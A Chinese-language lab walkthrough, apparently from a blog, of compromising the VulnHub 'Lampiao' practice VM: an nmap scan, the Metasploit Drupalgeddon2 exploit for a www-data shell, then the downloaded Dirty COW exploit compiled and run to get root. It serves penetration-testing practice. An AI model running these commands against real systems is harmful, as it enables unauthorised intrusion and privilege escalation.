赞
踩
通过vulnhub平台搭建靶场
靶机地址:Vulnerable By Design - Search: lampiao ~ VulnHub
靶机下载地址:https://download.vulnhub.com/lampiao/Lampiao.zip
下载完成后,双击Lampiao.ovf运行
启动靶机后,默认是不给用户名、密码和IP地址的
通过查看kali自身的IP地址,如下图,确定当前靶机也在192.168.200下,使用nmap进行C段扫描
nmap扫描192.168.200.0/24
首先我们使用nmap的sP参数通过ping探测已存活的主机
nmap -sP 192.168.200.0/24
扫描192.168.200.152的端口
nmap -p1-65535 192.168.200.152
访问192.168.200.152:1898
启动msf,通过msf搜索所有关于Drupal的漏洞
使用exploit/unix/webapp/drupal_drupalgeddon2
show options查看所需参数
设置目标地址和目标端口
set rhost 192.168.200.152
set rport 1898
exploit进行攻击,并返回meterpreter会话
查看当前用户为www-data
上传漏洞收集脚本到目标主机赋予执行权限并执行
下载地址:GitHub - mzet-/linux-exploit-suggester: Linux privilege escalation auditing tool
upload /home/kali/桌面/linux-exploit-suggester.sh /tmp/1.sh
进入目标主机的/tmp目录,查看上传的1.sh是否存在
赋予1.sh执行权限
chmod +x 1.sh
运行1.sh,发现该靶机存在脏牛漏洞
上传漏洞收集脚本到目标主机赋予执行权限并执行
exp下载地址:https://codeload.github.com/gbonacini/CVE-2016-5195/zip/refs/heads/master
退出shell交互模式,返回meterpreter会话,将脚本上传至目标地址
upload /home/kali/桌面/dcow.cpp /tmp/dcow.cpp
进入shell交互,编译exp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
开启py终端,运行./dcow,获取密码
python -c 'import pty; pty.spawn("/bin/bash")'
登录root用户,查看当前权限
用户名:root
密码:dirtyCowFun
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。